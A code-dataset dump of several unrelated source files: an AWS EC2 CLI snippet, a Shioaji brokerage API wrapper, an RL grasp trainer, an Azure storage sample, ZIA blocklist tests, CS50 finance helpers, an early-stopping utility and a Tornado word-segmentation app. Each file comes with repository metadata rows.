layers ec2 -p yourog instance-list \
| jq -r ".[] | [
.InstanceId,
.Tags[0].Value,
.SecurityGroups[0].GroupName,
.SecurityGroups[0].GroupId] | @csv" \
| csvtomd
"""
instance_set = instance.get_instances()
click.echo(J(instance_set))
@ec2_instance.command()
@click.argument("instance_id")
@click.pass_context
def create_ami(ctx, instance_id):
"""ec2: create AMI for instance_id """
obj = instance.Instance.factory(instance_id)
obj.create_image()
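# Illustrative CLI usage (assuming this click group is exposed as `layers ec2`, as in
# the instance_list docstring above):
#   layers ec2 -p <profile> instance-list
#   layers ec2 -p <profile> create-ami <instance_id>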
| 22.25641 | 51 | 0.656682 |
b684b92267bc405e4f36930958ad7df8fe4381db | 107 | py | Python | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | from .method_count_checker import MethodCountChecker
from .method_length_checker import MethodLengthChecker | 53.5 | 54 | 0.915888 |
a0df4d8eb13037dcf09f28c3258698e74817c06d | 15,973 | py | Python | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 14 | 2021-10-04T16:46:55.000Z | 2022-03-20T02:11:33.000Z | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 1 | 2022-01-15T19:38:03.000Z | 2022-01-17T05:29:13.000Z | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 10 | 2021-10-04T17:15:27.000Z | 2022-02-08T03:10:51.000Z | # -*- coding: utf-8 -*-
import sys, logging
from datetime import datetime,date,timedelta
from . import config
import time
import shioaji as sj
from shioaji import TickFOPv1, TickSTKv1, BidAskSTKv1, BidAskFOPv1,Exchange
class Caller(object):
def __init__(self):
self._userID = config.userId
self._userPassowrd = config.userPassowrd
self._connected = False
self._api = sj.Shioaji()
self._caStatus = False
logging.info("shioaji version:"+sj.__version__)
print("shioaji version:"+sj.__version__)
self._api.quote.set_event_callback(self._event_callback)
self._api.quote.set_on_tick_stk_v1_callback(self.Quote_callback_stk_v1_tick)
self._api.quote.set_on_bidask_stk_v1_callback(self.Quote_callback_stk_v1_bidask)
self._api.quote.set_on_tick_fop_v1_callback(self.Quote_callback_fop_v1_tick)
self._api.quote.set_on_bidask_fop_v1_callback(self.Quote_callback_fop_v1_bidask)
self._api.set_order_callback(self.Order_CallBack)
def Order_CallBack(self,stat, msg):
if hasattr(self, 'OrderCB'):
self.OrderCB(stat, msg)
def Trade_CallBack(self,keyword_params):
if hasattr(self, 'TradeCB'):
self.TradeCB(**keyword_params)
def SetOrderCallBack(self,callback):
if callable(callback):
self.OrderCB=callback
def SetTradeCallBack(self,callback):
if callable(callback):
self.TradeCB=callback
def SetEnevtCallBack(self,callback):
if callable(callback):
self.EventCallback=callback
def SetSubscribeStocksTickCallBack(self,callback):
if callable(callback):
self.SubscribeStocksTickCallBack= callback
def SetSubscribeFuturesTickCallBack(self,callback):
if callable(callback):
self.SubscribeFuturesTickCallBack= callback
def SetSubscribeStocksBidaskCallBack(self,callback):
if callable(callback):
self.SubscribeStocksBidaskCallBack= callback
def SetSubscribeFuturesBidaskCallBack(self,callback):
if callable(callback):
self.SubscribeFuturesBidaskCallBack= callback
def SetAccount(self,userId:str="",userPassowrd:str=""):
if userId != None and userId !="":
self._userID = userId
if userPassowrd != None and userPassowrd !="":
self._userPassowrd = userPassowrd
def GetStockAccount(self):
if (self._check_connect()):
return self._api.stock_account
return False
def GetFutoptAccount(self):
if (self._check_connect()):
return self._api.futopt_account
return False
def GetAccountList(self):
if (self._check_connect()):
return self._api.list_accounts()
return False
def GetAccount(self):
if (self._check_connect()):
return self._accounts
return False
    # Only for futopt (futures/options) accounts!? https://sinotrade.github.io/tutor/accounting/account_portfolio/
    # That page notes: "The features of this page will be removed in the future."
def GetAccountMargin(self):
if (self._check_connect()):
return self._api.get_account_margin()
return False
def GetAccountMarginData(self):
account_margin = self.GetAccountMargin()
if account_margin:
return account_margin.data()
return False
def GetAccountOpenposition(self):
if (self._check_connect()):
return self._api.get_account_openposition()
return False
def GetAccountOpenpositionData(self):
account_openposition = self.GetAccountOpenposition()
if account_openposition:
return account_openposition.data()
return False
def GetAccountSettleProfitloss(self,start_date:str=""):
if (self._check_connect()):
if start_date == "":
start_date = (date.today() - timedelta(days=30)).strftime('%Y%m%d')
return self._api.get_account_settle_profitloss(start_date=start_date)
return False
def GetAccountSettleProfitlossData(self,start_date:str=""):
account_settle_profitloss = self.GetAccountSettleProfitloss(start_date)
if account_settle_profitloss:
return account_settle_profitloss.data()
return False
def Login(self):
if self._userPassowrd == None or self._userPassowrd == "" or self._userID == None or self._userID == "":
logging.error("Error!! No UserId or UserPassowrd.")
sys.exit(70)
self._accounts = self._api.login(self._userID, self._userPassowrd,contracts_cb = self.ContractsDone())
def LogOut(self):
self._connected = False
self._connected_ts = None
ret = self._api.logout()
self._api.Contracts = None
logging.info(f"LogOut.")
return ret
def ActivateCa(self,Cafiles:str="Sinopac.pfx",PersonId:str="",CaPasswd:str=""):
if PersonId =="":
PersonId = self._userID
if (self._check_connect()):
result = self._api.activate_ca(
ca_path=Cafiles,
ca_passwd=CaPasswd,
person_id=PersonId,
)
self._caStatus = result
return result
else:
return False
def ContractsDone(self):
logging.info(f"Loading Contracts is Done.")
def SubscribeStocks(self,code:str="",quote_type:str="tick",intraday_odd:bool=False,version:str="v1"):
if (code == None or code ==""):
return False
logging.info(f"SubscribeStocks {code} {quote_type} {version}")
if (self._check_connect()):
contract = self._api.Contracts.Stocks[code]
if contract != None:
self._api.quote.subscribe(contract ,quote_type=quote_type, intraday_odd=intraday_odd ,version=version)
return True
else:
return False
else:
return False
def SubscribeFutures(self,code:str="",quote_type:str="tick",intraday_odd:bool=False,version:str="v1"):
if (code == None or code ==""):
return False
logging.info(f"SubscribeFutures {code} {quote_type} {version}")
if (self._check_connect()):
contract = self._api.Contracts.Futures[code]
if contract != None:
self._api.quote.subscribe(contract ,quote_type=quote_type, intraday_odd=intraday_odd ,version=version)
return True
else:
return False
else:
return False
def UpdateOrderById(self,order_id:str="",price:float=0.0,qty:int=0):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
if price > 0.0 and qty > 0:
return dict(**self._api.update_order(trade=trade, price=price, qty=qty))
elif price > 0.0:
return dict(**self._api.update_order(trade=trade, price=price))
elif qty > 0:
return dict(**self._api.update_order(trade=trade, qty=qty))
else:
return False
return False
else:
return False
def CancelOrderById(self,order_id:str=""):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
return dict(**self._api.cancel_order(trade))
return False
else:
return False
def GetOrderById(self,order_id:str=""):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
return dict(**trade)
return False
else:
return False
def GetOrderList(self):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return tradeList
else:
ret=[]
for trade in tradeList:
ret.append(dict(**trade))
return ret
else:
return False
def OrderStocks(self,code:str="",price:float=0.0,quantity:int=0,action:str="",price_type:str="",order_type:str="",order_cond:str="",order_lot:str="Common",first_sell:str="false"):
"""
Code: Stocks code.
price: 10.0
quantity: 1
        action: {Buy, Sell} (buy, sell)
        price_type: {LMT, MKT} (limit price, market price)
        order_type: {ROD, IOC, FOK} (good for the day, immediate-or-cancel, fill-or-kill)
        order_cond: {Cash, MarginTrading, ShortSelling} (cash, margin purchase, short sale)
        order_lot: {Common, Fixing, Odd, IntradayOdd} (round lot, fixed-price session, after-hours odd lot, intraday odd lot)
first_sell {str}: {true, false}
"""
if self._check_connect():
if not self._caStatus:
return False
if (code == None or code ==""):
return False
if (price_type == "LMT" and price <= 0 ):
return False
contract = self._api.Contracts.Stocks[code]
order = self._api.Order(
action=action,
price=price,
quantity=quantity,
price_type=price_type,
order_type=order_type,
order_cond=order_cond,
order_lot=order_lot,
first_sell=first_sell,
account=self._api.stock_account)
return dict(**self._api.place_order(contract, order, timeout=0,cb=self.Trade_CallBack))
else:
return False
def OrderFutures(self,code:str="",price:float=0.0,quantity:int=0,action:str="",price_type:str="",order_type:str="",octype:str=""):
"""
Code: Futures code.
price: 100.0
quantity: 1
        action: {Buy, Sell} (buy, sell)
        price_type: {LMT, MKT, MKP} (limit price, market price, market price with range)
        order_type: {ROD, IOC, FOK} (good for the day, immediate-or-cancel, fill-or-kill)
        octype: {Auto, NewPosition, Cover, DayTrade} (auto, open new position, close position, day trade)
"""
if self._check_connect():
if not self._caStatus:
return False
if (code == None or code ==""):
return False
if (price_type == "LMT" and price <= 0 ):
return False
contract = self._api.Contracts.Futures[code]
order = self._api.Order(
action=action,
price=price,
quantity=quantity,
price_type=price_type,
order_type=order_type,
octype=octype,
account=self._api.futopt_account)
return dict(**self._api.place_order(contract, order, timeout=0,cb=self.Trade_CallBack))
else:
return False
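    # A minimal usage sketch for the two order helpers above (illustrative
    # values only; assumes Login() has succeeded and ActivateCa() returned True):
    #
    #   caller = Caller()
    #   caller.SetAccount(userId="YOUR_ID", userPassowrd="YOUR_PASSWORD")
    #   caller.Login()
    #   caller.ActivateCa(Cafiles="Sinopac.pfx", CaPasswd="CA_PASSWORD")
    #   caller.OrderStocks(code="2330", price=600.0, quantity=1, action="Buy",
    #                      price_type="LMT", order_type="ROD", order_cond="Cash")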
def Quote_callback_stk_v1_tick(self,exchange: Exchange, tick:TickSTKv1):
tickdata = tick.to_dict(raw=True)
tickdata['UNTime']= datetime.now()
tickdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeStocksTickCallBack'):
self.SubscribeStocksTickCallBack(tickdata)
def Quote_callback_stk_v1_bidask(self,exchange: Exchange, bidask:BidAskSTKv1):
bidaskdata = bidask.to_dict(raw=True)
bidaskdata['UNTime']= datetime.now()
bidaskdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeStocksBidaskCallBack'):
self.SubscribeStocksBidaskCallBack(bidaskdata)
def Quote_callback_fop_v1_tick(self,exchange: Exchange, tick:TickFOPv1):
tickdata = tick.to_dict(raw=True)
tickdata['UNTime']= datetime.now()
tickdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeFuturesTickCallBack'):
self.SubscribeFuturesTickCallBack(tickdata)
def Quote_callback_fop_v1_bidask(self,exchange: Exchange, bidask:BidAskFOPv1):
bidaskdata = bidask.to_dict(raw=True)
bidaskdata['UNTime']= datetime.now()
bidaskdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeFuturesBidaskCallBack'):
self.SubscribeFuturesBidaskCallBack(bidaskdata)
def Quote_callback(self,topic: str, quote: dict):
        print(f"Topic:{topic} Quote: {quote}")
def _event_callback(self,ResponseCode:int,Code:int, Message:str,Description:str):
logging.info(f'EventCallback {ResponseCode} {Code} {Message} Event: {Description}')
if ResponseCode == 0 and Code == 0:
self._connected = True
self._connected_ts=time.time()
if hasattr(self, 'EventCallback'):
item = {
"ResponseCode":ResponseCode,
"Code": Code,
"Message": Message,
"Description": Description,
}
self.EventCallback(item)
def _check_connect(self, timeout=30, period=0.25):
if self._connected and (time.time() - self._connected_ts) < 86400-30:
return self._accounts
        # the login token expires after 24 hours; re-login 30 seconds before expiry
        if self._connected and (time.time() - self._connected_ts) >= 86400-30:
            self.LogOut()
self.Login()
mustend = time.time() + timeout
while time.time() < mustend:
if self._connected == True: return True
time.sleep(period)
return False
def GetTicks(self,StockCode:str="",FutureCode:str="",**kwargs):
if (self._check_connect()):
if StockCode != None and StockCode !="":
contract = self.getContractsStockByCode(StockCode)
if FutureCode != None and FutureCode !="":
contract = self.getContractsFutures(FutureCode)
if contract != None:
return self._api.ticks(contract=contract, **kwargs)
return False
def GetBars(self,StockCode:str="",FutureCode:str="",**kwargs):
if (self._check_connect()):
if StockCode != None and StockCode !="":
contract = self.getContractsStockByCode(StockCode)
if FutureCode != None and FutureCode !="":
contract = self.getContractsFutures(FutureCode)
if contract != None:
return self._api.kbars(contract=contract, **kwargs)
return False
## OTC, TSE
def getContractsIndexs(self,Exchange:str):
if (self._check_connect()):
return self._api.Contracts.Indexs[Exchange]
## OES, OTC, TSE
def getContractsStocks(self,Exchange:str):
if (self._check_connect()):
return self._api.Contracts.Stocks[Exchange]
def getContractsStockByCode(self,Code:str):
if (self._check_connect()):
return self._api.Contracts.Stocks[Code]
def getContractsFutures(self,Code:str=""):
if (self._check_connect()):
if Code == "":
return self._api.Contracts.Futures
else:
return self._api.Contracts.Futures[Code]
def getContractsOptions(self,Code:str=""):
if (self._check_connect()):
if Code == "":
return self._api.Contracts.Options
else:
return self._api.Contracts.Options[Code]
def __del__(self):
if self._connected:
self._api.logout()
del self._api | 37.850711 | 183 | 0.591999 |
d80dd98cfd33985bdc8de27e2ad2810d56cce77b | 1,498 | py | Python | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | 7 | 2019-10-13T13:01:25.000Z | 2022-03-13T02:24:34.000Z | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | 1 | 2020-11-08T03:13:28.000Z | 2020-11-08T03:13:28.000Z | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | null | null | null | from VisualGrasp.environment import EnvGrasp
from VisualGrasp.model import CNNPolicy, CNNValue
from VisualGrasp.train import GraspTrain
from itertools import count
from MyDQN.logger import Logger
env = EnvGrasp()
gt = GraspTrain(CNNPolicy, CNNValue, 2, 2)
k = 0
log = Logger('./logs_grasp_cnn')
steps = 0
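# Training loop: each outer iteration runs one grasp episode of at most 200
# steps; transitions are buffered and gt.learn() is called once more than 32
# steps have accumulated or the episode terminates.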
for t in count():
steps += 1
episode_reward = 0
state, frame, pos = env.reset()
# print(env.grasp())
# time.sleep(100)
# env.open_griper()
# print('init state', state)
for i in range(200):
k += 1
# print(state)
# time.sleep(2)
action = gt.select_action_cnn(frame, pos)
# print('action : ', action)
reward, next_state, done, next_frame, next_pos = env.step(action)
episode_reward += reward
gt.buffer.add((state, action, next_state, reward, done, frame, next_frame, pos, next_pos))
# print('reward : ', reward)
if k > 32 or done == 1:
k = 0
gt.learn()
if done == 1:
break
state = next_state
frame = next_frame
pos = next_pos
gt.buffer.clear()
if t % 10 == 0:
print('in epoch ' + str(t) + ' episode reward : ', episode_reward)
if t % 1000 == 999:
gt.save_model('policy_cnn_only_grasp_' + str(t) + '.para', 'value_cnn_only_grasp_' + str(t) + '.para')
info = {'episode reward': episode_reward}
for tag, value in info.items():
log.scalar_summary(tag, value, step=steps)
| 30.571429 | 110 | 0.600801 |
87679ab307bdc53327b041b9b9f59e4225d6ade7 | 3,048 | py | Python | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 47 | 2020-05-29T18:25:57.000Z | 2022-03-30T06:04:56.000Z | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 27 | 2020-05-13T06:37:24.000Z | 2022-03-01T07:58:34.000Z | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 67 | 2020-05-09T06:09:19.000Z | 2022-03-22T23:18:06.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from azure.identity import DefaultAzureCredential
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
GROUP_NAME = "testgroupx"
STORAGE_ACCOUNT = "storageaccountxxy"
FILE_SHARE = "filesharexxyyzz"
# Create client
# # For other authentication approaches, please see: https://pypi.org/project/azure-identity/
resource_client = ResourceManagementClient(
credential=DefaultAzureCredential(),
subscription_id=SUBSCRIPTION_ID
)
storage_client = StorageManagementClient(
credential=DefaultAzureCredential(),
subscription_id=SUBSCRIPTION_ID
)
# Create resource group
resource_client.resource_groups.create_or_update(
GROUP_NAME,
{"location": "eastus"}
)
# - init depended resources -
# Create storage account
storage_client.storage_accounts.begin_create(
GROUP_NAME,
STORAGE_ACCOUNT,
{
"sku": {
"name": "Standard_GRS"
},
"kind": "StorageV2",
"location": "eastus",
"encryption": {
"services": {
"file": {
"key_type": "Account",
"enabled": True
},
"blob": {
"key_type": "Account",
"enabled": True
}
},
"key_source": "Microsoft.Storage"
},
"tags": {
"key1": "value1",
"key2": "value2"
}
}
).result()
# - end -
# Create file share
file_share = storage_client.file_shares.create(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE,
{}
)
print("Create file share:\n{}".format(file_share))
# Get file share
file_share = storage_client.file_shares.get(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE
)
print("Get file share:\n{}".format(file_share))
# Update file share
file_share = storage_client.file_shares.update(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE,
{
"properties": {
"metadata": {
"type": "image"
}
}
}
)
print("Update file share:\n{}".format(file_share))
# Delete file share
file_share = storage_client.file_shares.delete(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE
)
print("Delete file share.\n")
# Delete Group
resource_client.resource_groups.begin_delete(
GROUP_NAME
).result()
if __name__ == "__main__":
main()
| 26.051282 | 97 | 0.549869 |
0ae147dd79a39e93886981edd8edb26cc78a5fe2 | 3,405 | py | Python | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 65 | 2017-12-04T13:58:32.000Z | 2022-03-24T18:33:17.000Z | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 48 | 2018-03-02T19:17:14.000Z | 2022-03-09T22:00:38.000Z | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 95 | 2018-01-11T16:23:39.000Z | 2022-03-21T11:34:29.000Z | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import *
PACKAGE_NAME = "fn_zia"
FUNCTION_NAME = "funct_zia_get_blocklist"
# Read the mock configuration-data section from the package
config_data = get_mock_config()
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_funct_zia_get_blocklist_function(circuits, function_params, timeout=5):
# Create the submitTestFunction event
evt = SubmitTestFunction("funct_zia_get_blocklist", function_params)
# Fire a message to the function
circuits.manager.fire(evt)
# circuits will fire an "exception" event if an exception is raised in the FunctionComponent
# return this exception if it is raised
exception_event = circuits.watcher.wait("exception", parent=None, timeout=timeout)
if exception_event is not False:
exception = exception_event.args[1]
raise exception
# else return the FunctionComponent's results
else:
event = circuits.watcher.wait("funct_zia_get_blocklist_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFunctZiaGetBlocklist:
""" Tests for the funct_zia_get_blocklist function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
mock_inputs_1 = {
"zia_url_filter": None
}
expected_results_1 = {"blacklistUrls": ["badhost.com", "192.168.12.2"], "url_counts": {"filtered": 2, "total": 2}}
mock_inputs_2 = {
"zia_url_filter": ".*"
}
expected_results_2 = {"blacklistUrls": ["badhost.com", "192.168.12.2"], "url_counts": {"filtered": 2, "total": 2}}
mock_inputs_3 = {
"zia_url_filter": "badhost"
}
expected_results_3 = {"blacklistUrls": ["badhost.com"], "url_counts": {"filtered": 1, "total": 2}}
mock_inputs_4 = {
"zia_url_filter": "goodhost"
}
expected_results_4 = {"blacklistUrls": [], "url_counts": {"filtered": 0, "total": 2}}
@patch("fn_zia.components.funct_zia_get_blocklist.ZiaClient", side_effect=mocked_zia_client)
@pytest.mark.parametrize("mock_inputs, expected_results", [
(mock_inputs_1, expected_results_1),
(mock_inputs_2, expected_results_2),
(mock_inputs_3, expected_results_3),
(mock_inputs_4, expected_results_4)
])
def test_success(self, mock_cli, circuits_app, mock_inputs, expected_results):
""" Test calling with sample values for the parameters """
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
results = call_funct_zia_get_blocklist_function(circuits_app, mock_inputs)
assert_keys_in(results, *keys)
assert(expected_results == results["content"])
| 35.842105 | 118 | 0.70837 |
32087a64c819100593a4b33552703228b12dac04 | 2,179 | py | Python | 2020-S2/psets/2018/pset7/finance/helpers.py | BoomlabsInc/BCSF | 5bde1a113ac6fa7bf45dcf9bea9ec32f78b8e129 | [
"MIT"
] | 2 | 2020-11-20T18:47:29.000Z | 2022-03-19T12:52:44.000Z | 2020-S2/psets/2018/pset7/finance/helpers.py | DLozanoNavas/BCSF_Repo | d2776837c772b29008817cddf7eea241b0813809 | [
"MIT"
] | null | null | null | 2020-S2/psets/2018/pset7/finance/helpers.py | DLozanoNavas/BCSF_Repo | d2776837c772b29008817cddf7eea241b0813809 | [
"MIT"
] | null | null | null | import csv
import os
import urllib.request
from flask import redirect, render_template, request, session
from functools import wraps
def apology(message, code=400):
"""Render message as an apology to user."""
def escape(s):
"""
Escape special characters.
https://github.com/jacebrowning/memegen#special-characters
"""
for old, new in [("-", "--"), (" ", "-"), ("_", "__"), ("?", "~q"),
("%", "~p"), ("#", "~h"), ("/", "~s"), ("\"", "''")]:
s = s.replace(old, new)
return s
return render_template("apology.html", top=code, bottom=escape(message)), code
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup(symbol):
"""Look up quote for symbol."""
# Reject symbol if it starts with caret
if symbol.startswith("^"):
return None
# Reject symbol if it contains comma
if "," in symbol:
return None
# Query Alpha Vantage for quote
# https://www.alphavantage.co/documentation/
try:
# GET CSV
url = f"https://www.alphavantage.co/query?apikey={os.getenv('API_KEY')}&datatype=csv&function=TIME_SERIES_INTRADAY&interval=1min&symbol={symbol}"
webpage = urllib.request.urlopen(url)
# Parse CSV
datareader = csv.reader(webpage.read().decode("utf-8").splitlines())
# Ignore first row
next(datareader)
# Parse second row
row = next(datareader)
# Ensure stock exists
try:
price = float(row[4])
except:
return None
# Return stock's name (as a str), price (as a float), and (uppercased) symbol (as a str)
return {
"price": price,
"symbol": symbol.upper()
}
except:
return None
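# Example (hypothetical values): lookup("NFLX") would return something like
# {"price": 123.45, "symbol": "NFLX"}, or None if the symbol is rejected,
# the request fails, or the response cannot be parsed.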
def usd(value):
"""Format value as USD."""
return f"${value:,.2f}"
| 25.635294 | 153 | 0.568609 |
29b134038238ae46f78b65e04934e74b81f6cf7b | 2,955 | py | Python | ppnp/tensorflow/earlystopping.py | achalagarwal/ppnp | 3c2e3d5fdeab175410107da07b166066923e6856 | [
"MIT"
] | 256 | 2019-02-20T13:57:13.000Z | 2022-02-28T15:44:25.000Z | ppnp/tensorflow/earlystopping.py | ibrahim85/Graph-Neural-Networks-meet-Personalized-PageRan | b408669b0a13797c84f5b6f0fab99fe3818abb92 | [
"MIT"
] | 15 | 2019-03-01T17:30:05.000Z | 2022-02-08T11:26:29.000Z | ppnp/tensorflow/earlystopping.py | ibrahim85/Graph-Neural-Networks-meet-Personalized-PageRan | b408669b0a13797c84f5b6f0fab99fe3818abb92 | [
"MIT"
] | 51 | 2019-02-27T08:25:30.000Z | 2022-02-14T09:57:35.000Z | from typing import List
import copy
import operator
from enum import Enum, auto
import numpy as np
from .model import Model
class StopVariable(Enum):
LOSS = auto()
ACCURACY = auto()
F1_SCORE = auto()
NONE = auto()
class Best(Enum):
RANKED = auto()
ALL = auto()
stopping_args = dict(
stop_varnames=[StopVariable.ACCURACY, StopVariable.LOSS],
patience=100, max_steps=10000, remember=Best.RANKED)
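# Default configuration: monitor accuracy and loss, allow 100 steps without
# improvement (up to 10000 steps in total) and remember the best weights using
# the ranked comparison strategy.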
class EarlyStopping:
def __init__(
self, model: Model, stop_varnames: List[StopVariable],
patience: int = 10, max_steps: int = 200, remember: Best = Best.ALL):
self.model = model
self.comp_ops = []
self.stop_vars = []
self.best_vals = []
for stop_varname in stop_varnames:
if stop_varname is StopVariable.LOSS:
self.stop_vars.append(model.loss)
self.comp_ops.append(operator.le)
self.best_vals.append(np.inf)
elif stop_varname is StopVariable.ACCURACY:
self.stop_vars.append(model.accuracy)
self.comp_ops.append(operator.ge)
self.best_vals.append(-np.inf)
elif stop_varname is StopVariable.F1_SCORE:
self.stop_vars.append(model.f1_score)
self.comp_ops.append(operator.ge)
self.best_vals.append(-np.inf)
self.remember = remember
self.remembered_vals = copy.copy(self.best_vals)
self.max_patience = patience
self.patience = self.max_patience
self.max_steps = max_steps
self.best_step = None
self.best_trainables = None
def check(self, values: List[np.floating], step: int) -> bool:
checks = [self.comp_ops[i](val, self.best_vals[i])
for i, val in enumerate(values)]
if any(checks):
self.best_vals = np.choose(checks, [self.best_vals, values])
self.patience = self.max_patience
comp_remembered = [
self.comp_ops[i](val, self.remembered_vals[i])
for i, val in enumerate(values)]
if self.remember is Best.ALL:
if all(comp_remembered):
self.best_step = step
self.remembered_vals = copy.copy(values)
self.best_trainables = self.model.get_vars()
elif self.remember is Best.RANKED:
for i, comp in enumerate(comp_remembered):
if comp:
if not(self.remembered_vals[i] == values[i]):
self.best_step = step
self.remembered_vals = copy.copy(values)
self.best_trainables = self.model.get_vars()
break
else:
break
else:
self.patience -= 1
return self.patience == 0
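# Minimal usage sketch (illustrative; assumes a session `sess` that can
# evaluate the tensors collected in `stop_vars`):
#
#   early_stopping = EarlyStopping(model, **stopping_args)
#   for step in range(stopping_args['max_steps']):
#       # ... run one training step ...
#       if early_stopping.check(sess.run(early_stopping.stop_vars), step):
#           break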
| 35.178571 | 81 | 0.56176 |
5bf078f95e08bd1eb2802af9113b11d8cd3cdab1 | 16,999 | py | Python | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | 2 | 2017-05-22T08:36:08.000Z | 2017-05-22T09:58:31.000Z | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | null | null | null | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# This file is derivied from the Tornado tutorial
# https://github.com/tornadoweb/tornado/tree/stable/demos/blog and has
# been modified by Yang D.Y. <minvacai@sina.com> for:
# TextListHandler / AboutHandler/ RawTextHandler/ WordSegHandler and
# relative parts such as template files.
#
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import bcrypt
import concurrent.futures
import pymongo
import markdown
import os.path
import re
import tornado.escape
from tornado import gen
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import unicodedata
from tornado.options import define, options
import datetime
from bson.objectid import ObjectId
import json
import sys
sys.path.append('./')
define("port", default=9999, help="run on the given port", type=int)
# A thread pool to be used for password hashing with bcrypt.
executor = concurrent.futures.ThreadPoolExecutor(2)
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", HomeHandler),
(r"/archive", ArchiveHandler),
(r"/feed", FeedHandler),
(r"/entry/([^/]+)", EntryHandler),
(r"/compose", ComposeHandler),
(r"/auth/create", AuthCreateHandler),
(r"/auth/login", AuthLoginHandler),
(r"/auth/logout", AuthLogoutHandler),
(r"/about", AboutHandler),
(r"/texts", TextListHandler),
(r"/raw/([^/]+)", RawTextHandler),
(r"/ws/([^/]+)", WordSegHandler),
(r"/export", ExportHandler),
]
settings = dict(
blog_title=u"分词校对",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
ui_modules={"Entry": EntryModule},
xsrf_cookies=True,
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__EEEEEEEEEER",
login_url="/auth/login",
debug=True
)
